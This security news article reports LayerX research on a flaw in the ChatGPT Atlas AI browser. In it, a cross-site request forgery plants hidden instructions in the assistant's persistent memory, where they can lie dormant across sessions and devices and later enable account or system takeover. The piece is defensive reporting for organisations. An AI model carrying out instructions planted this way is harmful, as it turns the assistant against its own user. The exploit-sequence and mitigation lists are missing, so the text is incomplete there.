What we’ve learnt about deepfake scams in 2025
From fake celebrity endorsements to cloned voices in mobile scams, 2025 proved that deepfakes are now a real business and consumer risk.
Read More
ChatGPT Atlas is described as an AI-powered browser. The ChatGPT assistant is embedded into web browsing; enabling it to summarise pages, assist tasks, and retain ‘memories’ of browsing context for future use. It moves with you as you journey through the internet; and while that can be incredibly useful, it also creates new vulnerabilities.
Now, researchers at security platform LayerX have discovered a flaw in Atlas that allows a logged-in user to be tricked into executing a cross-site request forgery (CSRF) action, which injects hidden instructions into ChatGPT’s memory.
And because the assistant’s memory persists across sessions (and in Atlas’s case, across devices too), the injected instructions could remain active until the user deliberately clears them. In effect, a tool designed to assist users becomes a new persistence vector for attackers, as reported by The Hacker News.
The major difference between this and other browser tab exploits is that it targets the persistent memory feature of the assistant.
According to LayerX:
“The tainted memories will be invoked, and can execute remote code that will allow the attacker to gain control of the user account, their browser, code they are writing, or systems they have access to.”
While the vulnerability technically affects ChatGPT users in any browser, the researchers emphasise that Atlas is especially exposed. Their testing finds the Atlas browser lacks meaningful anti-phishing protections, and estimates that users of AI browsers (specifically Comet and Genspark) are up to 85% more vulnerable to phishing-style attacks than users of traditional browsers such as Google Chrome or Microsoft Edge.
The sequence of the exploit is described as:
Given the strong potential for persistence and lateral movement via this feature, organisations should treat AI-powered browsers with memory features as a distinct risk.
Practical steps might include:
This discovery by LayerX shows that embedding an AI assistant inside a browser with persistent memory creates a novel persistence and attack surface – one that traditional browser security controls can’t adequately defend against. With this in mind, organisations need to treat AI assistant browsers with memory as part of their enterprise attack surface.
And beyond that, this serves as a reminder that the attack surface continues to grow; and that as we integrate and embed AI tools across organisations, they bring new vulnerabilities. Those vulnerabilities could live in the very logic and memory of the systems we now rely on to think with us; so cybersecurity has a new job to do. We have to make users aware that the systems they’re co-working with are to be questioned, not trusted; and that an AI tool could become a new insider threat.
Join the newsletter to receive the latest updates in your inbox.
From fake celebrity endorsements to cloned voices in mobile scams, 2025 proved that deepfakes are now a real business and consumer risk.
Read More
As AI tools move from pilots to the fabric of everyday work, the same systems that boost productivity are leaking sensitive data and stretching identity controls past their limits.
Read More
AI is now woven into every layer of modern software development, but most security teams can’t see where or how it’s being used.
Read More